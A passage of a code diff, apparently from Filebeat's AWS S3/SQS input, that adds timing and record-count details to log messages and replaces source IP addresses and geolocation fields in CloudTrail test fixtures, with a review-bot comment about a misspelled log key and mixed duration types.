+++ b/x-pack/filebeat/input/awss3/sqs.go
@@ -88,7 +88,10 @@ func (r *sqsReader) Receive(ctx context.Context) error {
 }()
 
 if err := r.msgHandler.ProcessSQS(ctx, &msg); err != nil {
- r.log.Warnw("Failed processing SQS message.", "error", err, "message_id", *msg.MessageId)
+ r.log.Warnw("Failed processing SQS message.",
+ "error", err,
+ "message_id", *msg.MessageId,
+ "elapsed_time_ns", time.Since(start))
 }
 }(msg, time.Now())
 }
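Review bot: Both new `errors.Wrapf` messages in s3_objects.go misspell the field as `elasped_time_ns` — `"failed to get s3 object (elasped_time_ns=%d)"` in the first hunk and `"failed reading s3 object (elasped_time_ns=%d)"` in the `@@ -159,7 +158,8 @@` hunk — so anything matching logs on the `elapsed_time_ns` key used by the surrounding structured calls will miss these errors; change both to `elapsed_time_ns`. The same key is also fed two different types: the Wrapf calls pass `time.Since(start).Nanoseconds()` (an int64), while `p.log.Debugw("End S3 object processing.", "elapsed_time_ns", elapsed)` here and `"elapsed_time_ns", time.Since(start))` in the sqs.go hunk pass a `time.Duration`, which the structured encoder may render as a string or in a different unit depending on its duration encoding. Passing `elapsed.Nanoseconds()` and `time.Since(start).Nanoseconds()` in those two places makes the `_ns` suffix true everywhere. In sqs.go, `start` is a parameter of the closure whose signature lies outside the hunk, so that also needs confirming there.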
diff --git a/x-pack/filebeat/input/awss3/sqs_s3_event.go b/x-pack/filebeat/input/awss3/sqs_s3_event.go
index c906c74fa9e0..b6641a36c81c 100644
--- a/x-pack/filebeat/input/awss3/sqs_s3_event.go
+++ b/x-pack/filebeat/input/awss3/sqs_s3_event.go
@@ -265,7 +265,7 @@ func (p *sqsS3EventProcessor) processS3Events(ctx context.Context, log *logp.Log
 defer acker.Wait()
 
 var errs []error
- for _, event := range s3Events {
+ for i, event := range s3Events {
 s3Processor := p.s3ObjectHandler.Create(ctx, log, acker, event)
 if s3Processor == nil {
 continue
@@ -274,8 +274,8 @@ func (p *sqsS3EventProcessor) processS3Events(ctx context.Context, log *logp.Log
 // Process S3 object (download, parse, create events).
 if err := s3Processor.ProcessS3Object(); err != nil {
 errs = append(errs, errors.Wrapf(err,
- "failed processing S3 event for object key %q in bucket %q",
- event.S3.Object.Key, event.S3.Bucket.Name))
+ "failed processing S3 event for object key %q in bucket %q (object record %d of %d in SQS notification)",
+ event.S3.Object.Key, event.S3.Bucket.Name, i+1, len(s3Events)))
 }
 }
 
diff --git a/x-pack/filebeat/module/aws/cloudtrail/test/assume-role-json.log b/x-pack/filebeat/module/aws/cloudtrail/test/assume-role-json.log
index c2a4a5e884bb..90e496fc0ff2 100644
--- a/x-pack/filebeat/module/aws/cloudtrail/test/assume-role-json.log
+++ b/x-pack/filebeat/module/aws/cloudtrail/test/assume-role-json.log
@@ -1 +1 @@ -{"eventVersion":"1.05","userIdentity":{"type":"AssumedRole","principalId":"AROAIN5ATK5U7KEXAMPLE:JohnRole1","arn":"arn:aws:sts::111111111111:assumed-role/JohnDoe/JohnRole1","accountId":"111111111111","accessKeyId":"AKIAI44QH8DHBEXAMPLE","sessionContext":{"attributes":{"mfaAuthenticated":"false","creationDate":"2019-10-02T21:50:54Z"},"sessionIssuer":{"type":"Role","principalId":"AROAIN5ATK5U7KEXAMPLE","arn":"arn:aws:iam::111111111111:role/JohnRole1","accountId":"111111111111","userName":"JohnDoe"}}},"eventTime":"2019-10-02T22:12:29Z","eventSource":"sts.amazonaws.com","eventName":"AssumeRole","awsRegion":"us-east-2","sourceIPAddress":"123.145.67.89","userAgent":"aws-cli/1.16.248 Python/3.4.7 Linux/4.9.184-0.1.ac.235.83.329.metal1.x86_64 botocore/1.12.239","requestParameters":{"incomingTransitiveTags":{"Department":"Engineering"},"tags":[{"value":"johndoe@example.com","key":"Email"},{"value":"12345","key":"CostCenter"}],"roleArn":"arn:aws:iam::111111111111:role/JohnRole2","roleSessionName":"Role2WithTags","transitiveTagKeys":["Email","CostCenter"],"durationSeconds":3600},"responseElements":{"credentials":{"accessKeyId":"ASIAWHOJDLGPOEXAMPLE","expiration":"Oct 2, 2019 11:12:29 PM","sessionToken":"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"},"assumedRoleUser":{"assumedRoleId":"AROAIFR7WHDTSOYQYHFUE:Role2WithTags","arn":"arn:aws:sts::111111111111:assumed-role/test-role/Role2WithTags"}},"requestID":"b96b0e4e-e561-11e9-8b3f-7b396EXAMPLE","eventID":"1917948f-3042-46ec-98e2-62865EXAMPLE","resources":[{"ARN":"arn:aws:iam::111122223333:role/JohnRole2","accountId":"111111111111","type":"AWS::IAM::Role"}],"eventType":"AwsApiCall","recipientAccountId":"111111111111"} 
+{"eventVersion":"1.05","userIdentity":{"type":"AssumedRole","principalId":"AROAIN5ATK5U7KEXAMPLE:JohnRole1","arn":"arn:aws:sts::111111111111:assumed-role/JohnDoe/JohnRole1","accountId":"111111111111","accessKeyId":"AKIAI44QH8DHBEXAMPLE","sessionContext":{"attributes":{"mfaAuthenticated":"false","creationDate":"2019-10-02T21:50:54Z"},"sessionIssuer":{"type":"Role","principalId":"AROAIN5ATK5U7KEXAMPLE","arn":"arn:aws:iam::111111111111:role/JohnRole1","accountId":"111111111111","userName":"JohnDoe"}}},"eventTime":"2019-10-02T22:12:29Z","eventSource":"sts.amazonaws.com","eventName":"AssumeRole","awsRegion":"us-east-2","sourceIPAddress":"81.2.69.144","userAgent":"aws-cli/1.16.248 Python/3.4.7 Linux/4.9.184-0.1.ac.235.83.329.metal1.x86_64 botocore/1.12.239","requestParameters":{"incomingTransitiveTags":{"Department":"Engineering"},"tags":[{"value":"johndoe@example.com","key":"Email"},{"value":"12345","key":"CostCenter"}],"roleArn":"arn:aws:iam::111111111111:role/JohnRole2","roleSessionName":"Role2WithTags","transitiveTagKeys":["Email","CostCenter"],"durationSeconds":3600},"responseElements":{"credentials":{"accessKeyId":"ASIAWHOJDLGPOEXAMPLE","expiration":"Oct 2, 2019 11:12:29 PM","sessionToken":"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"},"assumedRoleUser":{"assumedRoleId":"AROAIFR7WHDTSOYQYHFUE:Role2WithTags","arn":"arn:aws:sts::111111111111:assumed-role/test-role/Role2WithTags"}},"requestID":"b96b0e4e-e561-11e9-8b3f-7b396EXAMPLE","eventID":"1917948f-3042-46ec-98e2-62865EXAMPLE","resources":[{"ARN":"arn:aws:iam::111122223333:role/JohnRole2","accountId":"111111111111","type":"AWS::IAM::Role"}],"eventType":"AwsApiCall","recipientAccountId":"111111111111"} diff --git a/x-pack/filebeat/module/aws/cloudtrail/test/assume-role-json.log-expected.json b/x-pack/filebeat/module/aws/cloudtrail/test/assume-role-json.log-expected.json index 378b6f8b37f9..7e1ffad0eced 100644 --- a/x-pack/filebeat/module/aws/cloudtrail/test/assume-role-json.log-expected.json 
+++ b/x-pack/filebeat/module/aws/cloudtrail/test/assume-role-json.log-expected.json 
@@ -48,7 +48,7 @@ "event.id": "1917948f-3042-46ec-98e2-62865EXAMPLE", "event.kind": "event", "event.module": "aws", - "event.original": "{\"eventVersion\":\"1.05\",\"userIdentity\":{\"type\":\"AssumedRole\",\"principalId\":\"AROAIN5ATK5U7KEXAMPLE:JohnRole1\",\"arn\":\"arn:aws:sts::111111111111:assumed-role/JohnDoe/JohnRole1\",\"accountId\":\"111111111111\",\"accessKeyId\":\"AKIAI44QH8DHBEXAMPLE\",\"sessionContext\":{\"attributes\":{\"mfaAuthenticated\":\"false\",\"creationDate\":\"2019-10-02T21:50:54Z\"},\"sessionIssuer\":{\"type\":\"Role\",\"principalId\":\"AROAIN5ATK5U7KEXAMPLE\",\"arn\":\"arn:aws:iam::111111111111:role/JohnRole1\",\"accountId\":\"111111111111\",\"userName\":\"JohnDoe\"}}},\"eventTime\":\"2019-10-02T22:12:29Z\",\"eventSource\":\"sts.amazonaws.com\",\"eventName\":\"AssumeRole\",\"awsRegion\":\"us-east-2\",\"sourceIPAddress\":\"123.145.67.89\",\"userAgent\":\"aws-cli/1.16.248 Python/3.4.7 Linux/4.9.184-0.1.ac.235.83.329.metal1.x86_64 botocore/1.12.239\",\"requestParameters\":{\"incomingTransitiveTags\":{\"Department\":\"Engineering\"},\"tags\":[{\"value\":\"johndoe@example.com\",\"key\":\"Email\"},{\"value\":\"12345\",\"key\":\"CostCenter\"}],\"roleArn\":\"arn:aws:iam::111111111111:role/JohnRole2\",\"roleSessionName\":\"Role2WithTags\",\"transitiveTagKeys\":[\"Email\",\"CostCenter\"],\"durationSeconds\":3600},\"responseElements\":{\"credentials\":{\"accessKeyId\":\"ASIAWHOJDLGPOEXAMPLE\",\"expiration\":\"Oct 2, 2019 11:12:29 
PM\",\"sessionToken\":\"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\"},\"assumedRoleUser\":{\"assumedRoleId\":\"AROAIFR7WHDTSOYQYHFUE:Role2WithTags\",\"arn\":\"arn:aws:sts::111111111111:assumed-role/test-role/Role2WithTags\"}},\"requestID\":\"b96b0e4e-e561-11e9-8b3f-7b396EXAMPLE\",\"eventID\":\"1917948f-3042-46ec-98e2-62865EXAMPLE\",\"resources\":[{\"ARN\":\"arn:aws:iam::111122223333:role/JohnRole2\",\"accountId\":\"111111111111\",\"type\":\"AWS::IAM::Role\"}],\"eventType\":\"AwsApiCall\",\"recipientAccountId\":\"111111111111\"}", + "event.original": "{\"eventVersion\":\"1.05\",\"userIdentity\":{\"type\":\"AssumedRole\",\"principalId\":\"AROAIN5ATK5U7KEXAMPLE:JohnRole1\",\"arn\":\"arn:aws:sts::111111111111:assumed-role/JohnDoe/JohnRole1\",\"accountId\":\"111111111111\",\"accessKeyId\":\"AKIAI44QH8DHBEXAMPLE\",\"sessionContext\":{\"attributes\":{\"mfaAuthenticated\":\"false\",\"creationDate\":\"2019-10-02T21:50:54Z\"},\"sessionIssuer\":{\"type\":\"Role\",\"principalId\":\"AROAIN5ATK5U7KEXAMPLE\",\"arn\":\"arn:aws:iam::111111111111:role/JohnRole1\",\"accountId\":\"111111111111\",\"userName\":\"JohnDoe\"}}},\"eventTime\":\"2019-10-02T22:12:29Z\",\"eventSource\":\"sts.amazonaws.com\",\"eventName\":\"AssumeRole\",\"awsRegion\":\"us-east-2\",\"sourceIPAddress\":\"81.2.69.144\",\"userAgent\":\"aws-cli/1.16.248 Python/3.4.7 Linux/4.9.184-0.1.ac.235.83.329.metal1.x86_64 botocore/1.12.239\",\"requestParameters\":{\"incomingTransitiveTags\":{\"Department\":\"Engineering\"},\"tags\":[{\"value\":\"johndoe@example.com\",\"key\":\"Email\"},{\"value\":\"12345\",\"key\":\"CostCenter\"}],\"roleArn\":\"arn:aws:iam::111111111111:role/JohnRole2\",\"roleSessionName\":\"Role2WithTags\",\"transitiveTagKeys\":[\"Email\",\"CostCenter\"],\"durationSeconds\":3600},\"responseElements\":{\"credentials\":{\"accessKeyId\":\"ASIAWHOJDLGPOEXAMPLE\",\"expiration\":\"Oct 2, 2019 11:12:29 
PM\",\"sessionToken\":\"AgoJb3JpZ2luX2VjEB4aCXVzLXdlc3QtMSJHMEXAMPLETOKEN+//rJb8Lo30mFc5MlhFCEbubZvEj0wHB/mDMwIgSEe9gk/Zjr09tZV7F1HDTMhmEXAMPLETOKEN/iEJ/rkqngII9///////////ARABGgw0MjgzMDc4NjM5NjYiDLZjZFKwP4qxQG5sFCryASO4UPz5qE97wPPH1eLMvs7CgSDBSWfonmRTCfokm2FN1+hWUdQQH6adjbbrVLFL8c3jSsBhQ383AvxpwK5YRuDE1AI/+C+WKFZb701eiv9J5La2EXAMPLETOKEN/c7S5Iro1WUJ0q3Cxuo/8HUoSxVhQHM7zF7mWWLhXLEQ52ivL+F6q5dpXu4aTFedpMfnJa8JtkWwG9x1Axj0Ypy2ok8v5unpQGWych1vwdvj6ez1Dm8Xg1+qIzXILiEXAMPLETOKEN/vQGqu8H+nxp3kabcrtOvTFTvxX6vsc8OGwUfHhzAfYGEXAMPLETOKEN/L6v1yMM3B1OwFOrQBno1HEjf1oNI8RnQiMNFdUOtwYj7HUZIOCZmjfN8PPHq77N7GJl9lzvIZKQA0Owcjg+mc78zHCj8y0siY8C96paEXAMPLETOKEN/E3cpksxWdgs91HRzJWScjN2+r2LTGjYhyPqcmFzzo2mCE7mBNEXAMPLETOKEN/oJy+2o83YNW5tOiDmczgDzJZ4UKR84yGYOMfSnF4XcEJrDgAJ3OJFwmTcTQICAlSwLEXAMPLETOKEN\"},\"assumedRoleUser\":{\"assumedRoleId\":\"AROAIFR7WHDTSOYQYHFUE:Role2WithTags\",\"arn\":\"arn:aws:sts::111111111111:assumed-role/test-role/Role2WithTags\"}},\"requestID\":\"b96b0e4e-e561-11e9-8b3f-7b396EXAMPLE\",\"eventID\":\"1917948f-3042-46ec-98e2-62865EXAMPLE\",\"resources\":[{\"ARN\":\"arn:aws:iam::111122223333:role/JohnRole2\",\"accountId\":\"111111111111\",\"type\":\"AWS::IAM::Role\"}],\"eventType\":\"AwsApiCall\",\"recipientAccountId\":\"111111111111\"}", "event.outcome": "success", "event.provider": "sts.amazonaws.com", "event.type": [ 
@@ -58,17 +58,16 @@
 "input.type": "log",
 "log.offset": 0,
 "service.type": "aws",
- "source.address": "123.145.67.89",
- "source.as.number": 4837,
- "source.as.organization.name": "CHINA UNICOM China169 Backbone",
- "source.geo.continent_name": "Asia",
- "source.geo.country_iso_code": "CN",
- "source.geo.country_name": "China",
- "source.geo.location.lat": 29.5569,
- "source.geo.location.lon": 106.5531,
- "source.geo.region_iso_code": "CN-CQ",
- "source.geo.region_name": "Chongqing",
- "source.ip": "123.145.67.89",
+ "source.address": "81.2.69.144",
+ "source.geo.city_name": "London",
+ "source.geo.continent_name": "Europe",
+ "source.geo.country_iso_code": "GB",
+ "source.geo.country_name": "United Kingdom",
+ "source.geo.location.lat": 51.5142,
+ "source.geo.location.lon": -0.0931,
+ "source.geo.region_iso_code": "GB-ENG",
+ "source.geo.region_name": "England",
+ "source.ip": "81.2.69.144",
 "tags": [
 "forwarded"
 ],
diff --git a/x-pack/filebeat/module/aws/cloudtrail/test/create-key-pair-json.log b/x-pack/filebeat/module/aws/cloudtrail/test/create-key-pair-json.log
index 5b9c40ad40c4..520d80598ceb 100644
--- a/x-pack/filebeat/module/aws/cloudtrail/test/create-key-pair-json.log
+++ b/x-pack/filebeat/module/aws/cloudtrail/test/create-key-pair-json.log
@@ -1 +1 @@ -{"eventVersion":"1.0","userIdentity":{"type":"IAMUser","principalId":"EX_PRINCIPAL_ID","arn":"arn:aws:iam::123456789012:user/Alice","accountId":"123456789012","accessKeyId":"EXAMPLE_KEY_ID","userName":"Alice","sessionContext":{"attributes":{"mfaAuthenticated":"false","creationDate":"2014-03-06T15:15:06Z"}}},"eventTime":"2014-03-06T17:10:34Z","eventSource":"ec2.amazonaws.com","eventName":"CreateKeyPair","awsRegion":"us-east-2","sourceIPAddress":"72.21.198.64","userAgent":"EC2ConsoleBackend, aws-sdk-java/Linux/x.xx.fleetxen Java_HotSpot(TM)_64-Bit_Server_VM/xx","requestParameters":{"keyName":"mykeypair"},"responseElements":{"keyName":"mykeypair","keyFingerprint":"30:1d:46:d0:5b:ad:7e:1b:b6:70:62:8b:ff:38:b5:e9:ab:5d:b8:21","keyMaterial":""}} +{"eventVersion":"1.0","userIdentity":{"type":"IAMUser","principalId":"EX_PRINCIPAL_ID","arn":"arn:aws:iam::123456789012:user/Alice","accountId":"123456789012","accessKeyId":"EXAMPLE_KEY_ID","userName":"Alice","sessionContext":{"attributes":{"mfaAuthenticated":"false","creationDate":"2014-03-06T15:15:06Z"}}},"eventTime":"2014-03-06T17:10:34Z","eventSource":"ec2.amazonaws.com","eventName":"CreateKeyPair","awsRegion":"us-east-2","sourceIPAddress":"67.43.156.15","userAgent":"EC2ConsoleBackend, aws-sdk-java/Linux/x.xx.fleetxen Java_HotSpot(TM)_64-Bit_Server_VM/xx","requestParameters":{"keyName":"mykeypair"},"responseElements":{"keyName":"mykeypair","keyFingerprint":"30:1d:46:d0:5b:ad:7e:1b:b6:70:62:8b:ff:38:b5:e9:ab:5d:b8:21","keyMaterial":""}} diff --git a/x-pack/filebeat/module/aws/cloudtrail/test/create-key-pair-json.log-expected.json b/x-pack/filebeat/module/aws/cloudtrail/test/create-key-pair-json.log-expected.json index f2ce56d3683e..97a6f718cc12 100644 --- a/x-pack/filebeat/module/aws/cloudtrail/test/create-key-pair-json.log-expected.json +++ b/x-pack/filebeat/module/aws/cloudtrail/test/create-key-pair-json.log-expected.json 
@@ -22,7 +22,7 @@ "event.dataset": "aws.cloudtrail", "event.kind": "event", "event.module": "aws", - "event.original": "{\"eventVersion\":\"1.0\",\"userIdentity\":{\"type\":\"IAMUser\",\"principalId\":\"EX_PRINCIPAL_ID\",\"arn\":\"arn:aws:iam::123456789012:user/Alice\",\"accountId\":\"123456789012\",\"accessKeyId\":\"EXAMPLE_KEY_ID\",\"userName\":\"Alice\",\"sessionContext\":{\"attributes\":{\"mfaAuthenticated\":\"false\",\"creationDate\":\"2014-03-06T15:15:06Z\"}}},\"eventTime\":\"2014-03-06T17:10:34Z\",\"eventSource\":\"ec2.amazonaws.com\",\"eventName\":\"CreateKeyPair\",\"awsRegion\":\"us-east-2\",\"sourceIPAddress\":\"72.21.198.64\",\"userAgent\":\"EC2ConsoleBackend, aws-sdk-java/Linux/x.xx.fleetxen Java_HotSpot(TM)_64-Bit_Server_VM/xx\",\"requestParameters\":{\"keyName\":\"mykeypair\"},\"responseElements\":{\"keyName\":\"mykeypair\",\"keyFingerprint\":\"30:1d:46:d0:5b:ad:7e:1b:b6:70:62:8b:ff:38:b5:e9:ab:5d:b8:21\",\"keyMaterial\":\"\"}}", + "event.original": "{\"eventVersion\":\"1.0\",\"userIdentity\":{\"type\":\"IAMUser\",\"principalId\":\"EX_PRINCIPAL_ID\",\"arn\":\"arn:aws:iam::123456789012:user/Alice\",\"accountId\":\"123456789012\",\"accessKeyId\":\"EXAMPLE_KEY_ID\",\"userName\":\"Alice\",\"sessionContext\":{\"attributes\":{\"mfaAuthenticated\":\"false\",\"creationDate\":\"2014-03-06T15:15:06Z\"}}},\"eventTime\":\"2014-03-06T17:10:34Z\",\"eventSource\":\"ec2.amazonaws.com\",\"eventName\":\"CreateKeyPair\",\"awsRegion\":\"us-east-2\",\"sourceIPAddress\":\"67.43.156.15\",\"userAgent\":\"EC2ConsoleBackend, aws-sdk-java/Linux/x.xx.fleetxen Java_HotSpot(TM)_64-Bit_Server_VM/xx\",\"requestParameters\":{\"keyName\":\"mykeypair\"},\"responseElements\":{\"keyName\":\"mykeypair\",\"keyFingerprint\":\"30:1d:46:d0:5b:ad:7e:1b:b6:70:62:8b:ff:38:b5:e9:ab:5d:b8:21\",\"keyMaterial\":\"\"}}", "event.outcome": "success", "event.provider": "ec2.amazonaws.com", "event.type": [ 
@@ -36,18 +36,14 @@
 "Alice"
 ],
 "service.type": "aws",
- "source.address": "72.21.198.64",
- "source.as.number": 16509,
- "source.as.organization.name": "Amazon.com, Inc.",
- "source.geo.city_name": "Ashburn",
- "source.geo.continent_name": "North America",
- "source.geo.country_iso_code": "US",
- "source.geo.country_name": "United States",
- "source.geo.location.lat": 39.0481,
- "source.geo.location.lon": -77.4728,
- "source.geo.region_iso_code": "US-VA",
- "source.geo.region_name": "Virginia",
- "source.ip": "72.21.198.64",
+ "source.address": "67.43.156.15",
+ "source.as.number": 35908,
+ "source.geo.continent_name": "Asia",
+ "source.geo.country_iso_code": "BT",
+ "source.geo.country_name": "Bhutan",
+ "source.geo.location.lat": 27.5,
+ "source.geo.location.lon": 90.5,
+ "source.ip": "67.43.156.15",
 "tags": [
 "forwarded"
 ],
diff --git a/x-pack/filebeat/module/aws/cloudtrail/test/update-trail-json.log b/x-pack/filebeat/module/aws/cloudtrail/test/update-trail-json.log
index f8a9bc9e2a34..acb1c89f110a 100644
--- a/x-pack/filebeat/module/aws/cloudtrail/test/update-trail-json.log
+++ b/x-pack/filebeat/module/aws/cloudtrail/test/update-trail-json.log
@@ -1,2 +1,2 @@ -{"eventVersion":"1.04","userIdentity":{"type":"IAMUser","principalId":"EX_PRINCIPAL_ID","arn":"arn:aws:iam::123456789012:user/Alice","accountId":"123456789012","accessKeyId":"EXAMPLE_KEY_ID","userName":"Alice"},"eventTime":"2016-07-14T19:15:45Z","eventSource":"cloudtrail.amazonaws.com","eventName":"UpdateTrail","awsRegion":"us-east-2","sourceIPAddress":"205.251.233.182","userAgent":"aws-cli/1.10.32 Python/2.7.9 Windows/7 botocore/1.4.22","errorCode":"TrailNotFoundException","errorMessage":"Unknown trail: myTrail2 for the user: 123456789012","requestParameters":{"name":"myTrail2"},"responseElements":null,"requestID":"5d40662a-49f7-11e6-97e4-dEXAMPLE","eventID":"b7d4398e-b2f0-4faa-9c76-e2EXAMPLE","eventType":"AwsApiCall","recipientAccountId":"123456789012"} +{"eventVersion":"1.04","userIdentity":{"type":"IAMUser","principalId":"EX_PRINCIPAL_ID","arn":"arn:aws:iam::123456789012:user/Alice","accountId":"123456789012","accessKeyId":"EXAMPLE_KEY_ID","userName":"Alice"},"eventTime":"2016-07-14T19:15:45Z","eventSource":"cloudtrail.amazonaws.com","eventName":"UpdateTrail","awsRegion":"us-east-2","sourceIPAddress":"81.2.69.143","userAgent":"aws-cli/1.10.32 Python/2.7.9 Windows/7 botocore/1.4.22","errorCode":"TrailNotFoundException","errorMessage":"Unknown trail: myTrail2 for the user: 123456789012","requestParameters":{"name":"myTrail2"},"responseElements":null,"requestID":"5d40662a-49f7-11e6-97e4-dEXAMPLE","eventID":"b7d4398e-b2f0-4faa-9c76-e2EXAMPLE","eventType":"AwsApiCall","recipientAccountId":"123456789012"} 
{"eventVersion":"1.05","userIdentity":{"type":"IAMUser","principalId":"EXAMPLE_ID","arn":"arn:aws:iam::0123456789012:user/Alice","accountId":"0123456789012","accessKeyId":"EXAMPLE_KEY","userName":"Alice","sessionContext":{"sessionIssuer":{},"webIdFederationData":{},"attributes":{"mfaAuthenticated":"true","creationDate":"2020-01-08T15:12:16Z"}},"invokedBy":"signin.amazonaws.com"},"eventTime":"2020-01-08T20:58:45Z","eventSource":"cloudtrail.amazonaws.com","eventName":"UpdateTrail","awsRegion":"us-west-2","sourceIPAddress":"127.0.0.1","userAgent":"signin.amazonaws.com","requestParameters":{"name":"arn:aws:cloudtrail:us-west-2:0123456789012:trail/TEST-trail","s3BucketName":"test-cloudtrail-bucket","snsTopicName":"","isMultiRegionTrail":true,"enableLogFileValidation":false,"kmsKeyId":""},"responseElements":{"name":"TEST-trail","s3BucketName":"test-cloudtrail-bucket","snsTopicName":"","snsTopicARN":"","includeGlobalServiceEvents":true,"isMultiRegionTrail":true,"trailARN":"arn:aws:cloudtrail:us-west-2:0123456789012:trail/TEST-trail","logFileValidationEnabled":false,"isOrganizationTrail":false},"requestID":"EXAMPLE-f3da-42d1-84f5-EXAMPLE","eventID":"EXAMPLE-b5e9-4846-8407-EXAMPLE","readOnly":false,"eventType":"AwsApiCall","recipientAccountId":"0123456789012"} diff --git a/x-pack/filebeat/module/aws/cloudtrail/test/update-trail-json.log-expected.json b/x-pack/filebeat/module/aws/cloudtrail/test/update-trail-json.log-expected.json index 1d00ae0c1718..f8bb122015c1 100644 --- a/x-pack/filebeat/module/aws/cloudtrail/test/update-trail-json.log-expected.json +++ b/x-pack/filebeat/module/aws/cloudtrail/test/update-trail-json.log-expected.json 
@@ -18,7 +18,7 @@ "event.id": "b7d4398e-b2f0-4faa-9c76-e2EXAMPLE", "event.kind": "event", "event.module": "aws", - "event.original": "{\"eventVersion\":\"1.04\",\"userIdentity\":{\"type\":\"IAMUser\",\"principalId\":\"EX_PRINCIPAL_ID\",\"arn\":\"arn:aws:iam::123456789012:user/Alice\",\"accountId\":\"123456789012\",\"accessKeyId\":\"EXAMPLE_KEY_ID\",\"userName\":\"Alice\"},\"eventTime\":\"2016-07-14T19:15:45Z\",\"eventSource\":\"cloudtrail.amazonaws.com\",\"eventName\":\"UpdateTrail\",\"awsRegion\":\"us-east-2\",\"sourceIPAddress\":\"205.251.233.182\",\"userAgent\":\"aws-cli/1.10.32 Python/2.7.9 Windows/7 botocore/1.4.22\",\"errorCode\":\"TrailNotFoundException\",\"errorMessage\":\"Unknown trail: myTrail2 for the user: 123456789012\",\"requestParameters\":{\"name\":\"myTrail2\"},\"responseElements\":null,\"requestID\":\"5d40662a-49f7-11e6-97e4-dEXAMPLE\",\"eventID\":\"b7d4398e-b2f0-4faa-9c76-e2EXAMPLE\",\"eventType\":\"AwsApiCall\",\"recipientAccountId\":\"123456789012\"}", + "event.original": "{\"eventVersion\":\"1.04\",\"userIdentity\":{\"type\":\"IAMUser\",\"principalId\":\"EX_PRINCIPAL_ID\",\"arn\":\"arn:aws:iam::123456789012:user/Alice\",\"accountId\":\"123456789012\",\"accessKeyId\":\"EXAMPLE_KEY_ID\",\"userName\":\"Alice\"},\"eventTime\":\"2016-07-14T19:15:45Z\",\"eventSource\":\"cloudtrail.amazonaws.com\",\"eventName\":\"UpdateTrail\",\"awsRegion\":\"us-east-2\",\"sourceIPAddress\":\"81.2.69.143\",\"userAgent\":\"aws-cli/1.10.32 Python/2.7.9 Windows/7 botocore/1.4.22\",\"errorCode\":\"TrailNotFoundException\",\"errorMessage\":\"Unknown trail: myTrail2 for the user: 123456789012\",\"requestParameters\":{\"name\":\"myTrail2\"},\"responseElements\":null,\"requestID\":\"5d40662a-49f7-11e6-97e4-dEXAMPLE\",\"eventID\":\"b7d4398e-b2f0-4faa-9c76-e2EXAMPLE\",\"eventType\":\"AwsApiCall\",\"recipientAccountId\":\"123456789012\"}", "event.outcome": "failure", "event.provider": "cloudtrail.amazonaws.com", "event.type": "info", 
@@ -29,18 +29,16 @@
 "Alice"
 ],
 "service.type": "aws",
- "source.address": "205.251.233.182",
- "source.as.number": 16509,
- "source.as.organization.name": "Amazon.com, Inc.",
- "source.geo.city_name": "Boardman",
- "source.geo.continent_name": "North America",
- "source.geo.country_iso_code": "US",
- "source.geo.country_name": "United States",
- "source.geo.location.lat": 45.8491,
- "source.geo.location.lon": -119.7143,
- "source.geo.region_iso_code": "US-OR",
- "source.geo.region_name": "Oregon",
- "source.ip": "205.251.233.182",
+ "source.address": "81.2.69.143",
+ "source.geo.city_name": "London",
+ "source.geo.continent_name": "Europe",
+ "source.geo.country_iso_code": "GB",
+ "source.geo.country_name": "United Kingdom",
+ "source.geo.location.lat": 51.5142,
+ "source.geo.location.lon": -0.0931,
+ "source.geo.region_iso_code": "GB-ENG",
+ "source.geo.region_name": "England",
+ "source.ip": "81.2.69.143",
 "tags": [
 "forwarded"
 ],
@@ -94,7 +92,7 @@
 "event.type": "info",
 "fileset.name": "cloudtrail",
 "input.type": "log",
- "log.offset": 766,
+ "log.offset": 762,
 "related.user": [
 "Alice"
 ],
diff --git a/x-pack/filebeat/module/aws/elb/test/application-lb-http.log b/x-pack/filebeat/module/aws/elb/test/application-lb-http.log
index 5d754c4bbaaa..75e3aedd7184 100644
--- a/x-pack/filebeat/module/aws/elb/test/application-lb-http.log
+++ b/x-pack/filebeat/module/aws/elb/test/application-lb-http.log
@@ -1,11 +1,11 @@ -http 2019-10-11T15:01:12.376735Z app/filebeat-aws-elb-test/c86a326e7dc14222 77.227.156.41:56398 10.0.0.192:80 -1 -1 -1 460 - 125 0 "GET http://filebeat-aws-elb-test-12030537.eu-central-1.elb.amazonaws.com:80/ HTTP/1.1" "curl/7.58.0" - - arn:aws:elasticloadbalancing:eu-central-1:627959692251:targetgroup/test-lb-instances/8f04c4fe71f5f794 "Root=1-5da09932-2c342a443bfb96249aa50ed7" "-" "-" 0 2019-10-11T15:01:06.657000Z "forward" "-" "-" -http 2019-10-11T15:01:50.492440Z app/filebeat-aws-elb-test/c86a326e7dc14222 77.227.156.41:56488 10.0.1.107:80 -1 -1 -1 504 - 125 308 "GET http://filebeat-aws-elb-test-12030537.eu-central-1.elb.amazonaws.com:80/ HTTP/1.1" "curl/7.58.0" - - arn:aws:elasticloadbalancing:eu-central-1:627959692251:targetgroup/test-lb-instances/8f04c4fe71f5f794 "Root=1-5da09954-2c342a443bfb96249aa50ed7" "-" "-" 0 2019-10-11T15:01:40.491000Z "forward" "-" "-" -http 2019-10-11T15:01:22.915238Z app/filebeat-aws-elb-test/c86a326e7dc14222 77.227.156.41:56416 10.0.0.192:80 -1 -1 -1 504 - 125 308 "GET http://filebeat-aws-elb-test-12030537.eu-central-1.elb.amazonaws.com:80/ HTTP/1.1" "curl/7.58.0" - - arn:aws:elasticloadbalancing:eu-central-1:627959692251:targetgroup/test-lb-instances/8f04c4fe71f5f794 "Root=1-5da09938-d9c72660e247c36070017828" "-" "-" 0 2019-10-11T15:01:12.914000Z "forward" "-" "-" -http 2019-10-11T15:01:35.190447Z app/filebeat-aws-elb-test/c86a326e7dc14222 77.227.156.41:56448 10.0.1.107:80 -1 -1 -1 504 - 125 308 "GET http://filebeat-aws-elb-test-12030537.eu-central-1.elb.amazonaws.com:80/ HTTP/1.1" "curl/7.58.0" - - arn:aws:elasticloadbalancing:eu-central-1:627959692251:targetgroup/test-lb-instances/8f04c4fe71f5f794 "Root=1-5da09945-0eaa8050df7d96f84806ded0" "-" "-" 0 2019-10-11T15:01:25.189000Z "forward" "-" "-" -http 2019-10-11T15:02:28.837316Z app/filebeat-aws-elb-test/c86a326e7dc14222 77.227.156.41:56602 10.0.0.192:80 -1 -1 -1 504 - 125 308 "GET http://filebeat-aws-elb-test-12030537.eu-central-1.elb.amazonaws.com:80/ 
